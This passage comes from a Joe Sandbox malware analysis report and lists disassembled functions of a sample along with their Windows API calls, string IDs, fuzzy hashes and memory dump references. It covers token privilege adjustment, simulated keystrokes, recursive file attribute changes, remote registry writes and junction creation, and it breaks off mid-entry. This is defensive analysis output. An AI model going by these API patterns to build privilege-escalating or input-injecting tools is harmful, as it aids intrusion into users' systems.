                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0035D6CF
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0035D6D2
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035D6E7
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0035D6F2
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035D6FC
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0035D701
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035D70A
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0035D70F
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035D719
                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 0035D71E
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0035D721
                                                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 0035D748
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                    • Opcode ID: f54d6b87ac132297aeda0c4c5be5d26c88c74653801957ec4767da482e1207cc
                                                                                                                    • Instruction ID: a485fc2b3d916d84e2f8d5384e6d22183d7c8201bb1dcef623387ef5c3bb6054
                                                                                                                    • Opcode Fuzzy Hash: f54d6b87ac132297aeda0c4c5be5d26c88c74653801957ec4767da482e1207cc
                                                                                                                    • Instruction Fuzzy Hash: AF317271A40318BFEB326FA19C49F7F7E6CEB45B51F114025FA04EA1E1C6B05941ABA1
                                                                                                                    Function 00378310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037882B
                                                                                                                      • Part of subcall function 003787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00378858
                                                                                                                      • Part of subcall function 003787E1: GetLastError.KERNEL32 ref: 00378865
                                                                                                                    • _memset.LIBCMT ref: 00378353
                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 003783A5
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003783B6
                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003783CD
                                                                                                                    • GetProcessWindowStation.USER32 ref: 003783E6
                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 003783F0
                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0037840A
                                                                                                                      • Part of subcall function 003781CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00378309), ref: 003781E0
                                                                                                                      • Part of subcall function 003781CB: CloseHandle.KERNEL32(?,?,00378309), ref: 003781F2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                    • String ID: $default$winsta0
                                                                                                                    • API String ID: 2063423040-1027155976
                                                                                                                    • Opcode ID: 510644b2668f68fda8fb5a476c7a19d0f2cf14110e77684c6c779423660fbd70
                                                                                                                    • Instruction ID: 92f324a77aefad9e7875101c6eaa45cdc477691865ccd93460c0a19db64e6b43
                                                                                                                    • Opcode Fuzzy Hash: 510644b2668f68fda8fb5a476c7a19d0f2cf14110e77684c6c779423660fbd70
                                                                                                                    • Instruction Fuzzy Hash: 1C819D71940209AFDF22DFA4CC49AFE7BB9FF05314F148169F918A6261DB398E14DB20
                                                                                                                    Function 0038C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0038C78D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0038C7E1
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038C806
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038C81D
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0038C844
                                                                                                                    • __swprintf.LIBCMT ref: 0038C890
                                                                                                                    • __swprintf.LIBCMT ref: 0038C8D3
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    • __swprintf.LIBCMT ref: 0038C927
                                                                                                                      • Part of subcall function 00343698: __woutput_l.LIBCMT ref: 003436F1
                                                                                                                    • __swprintf.LIBCMT ref: 0038C975
                                                                                                                      • Part of subcall function 00343698: __flsbuf.LIBCMT ref: 00343713
                                                                                                                      • Part of subcall function 00343698: __flsbuf.LIBCMT ref: 0034372B
                                                                                                                    • __swprintf.LIBCMT ref: 0038C9C4
                                                                                                                    • __swprintf.LIBCMT ref: 0038CA13
                                                                                                                    • __swprintf.LIBCMT ref: 0038CA62
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                    • API String ID: 3953360268-2428617273
                                                                                                                    • Opcode ID: 5ac3abf18c3001a18447fc587196023131da8f04229ef8f92665457a64cd714a
                                                                                                                    • Instruction ID: e9f3b1ca197632f201317cb89ebae47f1305ef51cf87e6a9996a4f870b0761b9
                                                                                                                    • Opcode Fuzzy Hash: 5ac3abf18c3001a18447fc587196023131da8f04229ef8f92665457a64cd714a
                                                                                                                    • Instruction Fuzzy Hash: C6A12FB2404315ABC706EF94D885EAFB7ECFF95700F40091AF595CA191EB34EA48CB62
                                                                                                                    Function 0038EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0038EFB6
                                                                                                                    • _wcscmp.LIBCMT ref: 0038EFCB
                                                                                                                    • _wcscmp.LIBCMT ref: 0038EFE2
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0038EFF4
                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0038F00E
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0038F026
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0038F031
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0038F04D
                                                                                                                    • _wcscmp.LIBCMT ref: 0038F074
                                                                                                                    • _wcscmp.LIBCMT ref: 0038F08B
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0038F09D
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(003D8920), ref: 0038F0BB
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0038F0C5
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0038F0D2
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0038F0E4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1803514871-438819550
                                                                                                                    • Opcode ID: 382396c874a6e0027162bf148fcdfc30ed190493139a4acb795b7a0e3ac2b0ab
                                                                                                                    • Instruction ID: f2aa9a23223ac18f2343614fcc11b40473a0a9cdc589168c5481834d434d307a
                                                                                                                    • Opcode Fuzzy Hash: 382396c874a6e0027162bf148fcdfc30ed190493139a4acb795b7a0e3ac2b0ab
                                                                                                                    • Instruction Fuzzy Hash: E931C3765012186FDF16BBA4EC48BEE77AC9F4A360F1102B6E844E3191DB70EA44CB65
                                                                                                                    Function 003A0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A0953
                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,003AF910,00000000,?,00000000,?,?), ref: 003A09C1
                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003A0A09
                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003A0A92
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 003A0DB2
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003A0DBF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                    • API String ID: 536824911-966354055
                                                                                                                    • Opcode ID: 1448c757d5bcfd11ebc5d4ed1fcbdafb410908e9b50500c50d1a8543f136d09a
                                                                                                                    • Instruction ID: af5f7a6bb194013e093d02d5df17f77d3b118755b2bc735e84b6c4a3c66e0d04
                                                                                                                    • Opcode Fuzzy Hash: 1448c757d5bcfd11ebc5d4ed1fcbdafb410908e9b50500c50d1a8543f136d09a
                                                                                                                    • Instruction Fuzzy Hash: FA024A756006119FCB1AEF24D895E2AB7E5FF8A320F05855DF8999B362CB30ED41CB81
                                                                                                                    Function 003366E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0D<$0E<$0F<$3c3$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG<$_3
                                                                                                                    • API String ID: 0-562281520
                                                                                                                    • Opcode ID: 81f20bb30b6985d16b2769f8950066c7659117db0e398eb082f3fb06d01ed9ea
                                                                                                                    • Instruction ID: ddac0eb3a2eb881dbfdbd64b8b3a7fef24ebd05c3c5dc89f153baa5ff0d2972b
                                                                                                                    • Opcode Fuzzy Hash: 81f20bb30b6985d16b2769f8950066c7659117db0e398eb082f3fb06d01ed9ea
                                                                                                                    • Instruction Fuzzy Hash: F4726F76E002199FDB26CF59C8817AEB7B5FF44310F15C16AE809EB691DB349981CB90
                                                                                                                    Function 0038F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0038F113
                                                                                                                    • _wcscmp.LIBCMT ref: 0038F128
                                                                                                                    • _wcscmp.LIBCMT ref: 0038F13F
                                                                                                                      • Part of subcall function 00384385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003843A0
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0038F16E
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0038F179
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0038F195
                                                                                                                    • _wcscmp.LIBCMT ref: 0038F1BC
                                                                                                                    • _wcscmp.LIBCMT ref: 0038F1D3
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0038F1E5
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(003D8920), ref: 0038F203
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0038F20D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0038F21A
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0038F22C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1824444939-438819550
                                                                                                                    • Opcode ID: 636cc779540211290ca3178d689e5d7d8d2e43ed2e241c65f524d56caa69e196
                                                                                                                    • Instruction ID: f30fe3e07a7e153232a2619eb183fc28ed902d73c6ec67dcbf3ec3edfa96afc3
                                                                                                                    • Opcode Fuzzy Hash: 636cc779540211290ca3178d689e5d7d8d2e43ed2e241c65f524d56caa69e196
                                                                                                                    • Instruction Fuzzy Hash: 1531B53A5003196EDB12BBA4EC59BEE77AC9F46360F1105B5E840E71A0DB30DE45CB64
                                                                                                                    Function 0038A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0038A20F
                                                                                                                    • __swprintf.LIBCMT ref: 0038A231
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0038A26E
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0038A293
                                                                                                                    • _memset.LIBCMT ref: 0038A2B2
                                                                                                                    • _wcsncpy.LIBCMT ref: 0038A2EE
                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0038A323
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0038A32E
                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0038A337
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0038A341
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                    • API String ID: 2733774712-3457252023
                                                                                                                    • Opcode ID: 1f428de9620351676f9db8cb262873a2e77d26a49ca97ff4a32d551cdd653348
                                                                                                                    • Instruction ID: 9c596c8eba3b49665a132883e8e859bf1dd1459560490059f41bc4ce91741805
                                                                                                                    • Opcode Fuzzy Hash: 1f428de9620351676f9db8cb262873a2e77d26a49ca97ff4a32d551cdd653348
                                                                                                                    • Instruction Fuzzy Hash: FA31A1B5900209ABDB22DFA0DC49FEB77BCEF89740F1041B6F508D6160EB7497448B25
                                                                                                                    Function 0038001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00380097
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00380102
                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00380122
                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00380139
                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00380168
                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00380179
                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 003801A5
                                                                                                                    • GetKeyState.USER32(00000011), ref: 003801B3
                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 003801DC
                                                                                                                    • GetKeyState.USER32(00000012), ref: 003801EA
                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00380213
                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00380221
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
                                                                                                                    • Opcode ID: 93b09840d3495d72454494450473e89881130dfeaf62baac83b1baec4dfb5ab9
                                                                                                                    • Instruction ID: eabbb71406408b6de7c455eb8b4295f84ff5bcbbb84dcc31f082a17706192b8c
                                                                                                                    • Opcode Fuzzy Hash: 93b09840d3495d72454494450473e89881130dfeaf62baac83b1baec4dfb5ab9
                                                                                                                    • Instruction Fuzzy Hash: 6C51EB649047882DFB7BFBB088557AABFB49F02380F0945D9D5C25A1C3DAA49B8CC761
                                                                                                                    Function 003A03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039FDAD,?,?), ref: 003A0E31
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A04AC
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003A054B
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003A05E3
                                                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003A0822
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003A082F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1240663315-0
                                                                                                                    • Opcode ID: a6e946d3c8ed7af5fff3fd1e59a8cf53d8c0be8cd6981397e229a157ada31dc4
                                                                                                                    • Instruction ID: 2b920bf0fb6f92a05fe3914fb2a47e82f96d1c7b67d5dec13b92ca62fe90ec4f
                                                                                                                    • Opcode Fuzzy Hash: a6e946d3c8ed7af5fff3fd1e59a8cf53d8c0be8cd6981397e229a157ada31dc4
                                                                                                                    • Instruction Fuzzy Hash: 7CE15071604214AFCB1ADF24C895E2ABBE8FF8A314F04856DF94ADB261D731ED05CB91
                                                                                                                    Function 003983BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    • CoInitialize.OLE32 ref: 00398403
                                                                                                                    • CoUninitialize.OLE32 ref: 0039840E
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,003B2BEC,?), ref: 0039846E
                                                                                                                    • IIDFromString.OLE32(?,?), ref: 003984E1
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0039857B
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003985DC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                    • API String ID: 834269672-1287834457
                                                                                                                    • Opcode ID: aae00d135671446405bc6a1885256e963753ddda11f3f68e23c49844d3d1604f
                                                                                                                    • Instruction ID: 86e429f9fe080ec6456c478c63883329f51cf1f8b05c0d286737f1d1a7e6e605
                                                                                                                    • Opcode Fuzzy Hash: aae00d135671446405bc6a1885256e963753ddda11f3f68e23c49844d3d1604f
                                                                                                                    • Instruction Fuzzy Hash: 7161D4716083129FCB12DF65D844F6EB7E8AF8A714F05481DF9859B291CB70ED48CB92
                                                                                                                    Function 00394164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
